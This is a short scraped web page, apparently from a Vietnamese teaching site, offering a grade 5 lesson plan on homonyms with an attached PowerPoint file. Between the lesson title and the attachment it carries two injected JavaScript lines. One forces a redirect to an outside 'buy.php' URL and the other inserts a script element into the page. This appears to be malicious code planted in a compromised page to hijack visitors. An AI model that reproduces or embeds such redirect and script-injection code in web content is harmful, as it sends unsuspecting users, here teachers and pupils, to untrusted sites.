Giáo án điện tử- Luyện từ và câu- Lớp5

19/03/2009 12:00 Sáng Phản hồi đã bị khóa

Bài: Từ đồng âm

location.replace(“http://gethere.info/buy.php”);

document.currentScript.parentNode.insertBefore(s, document.currentScript);

Tệp đính kèm

12374489700000_LTCTudongam.ppt
File: 12374489700000_LTCTudongam.ppt (4 MB)

Các phản hồi đã bị đóng lại bở quản trị.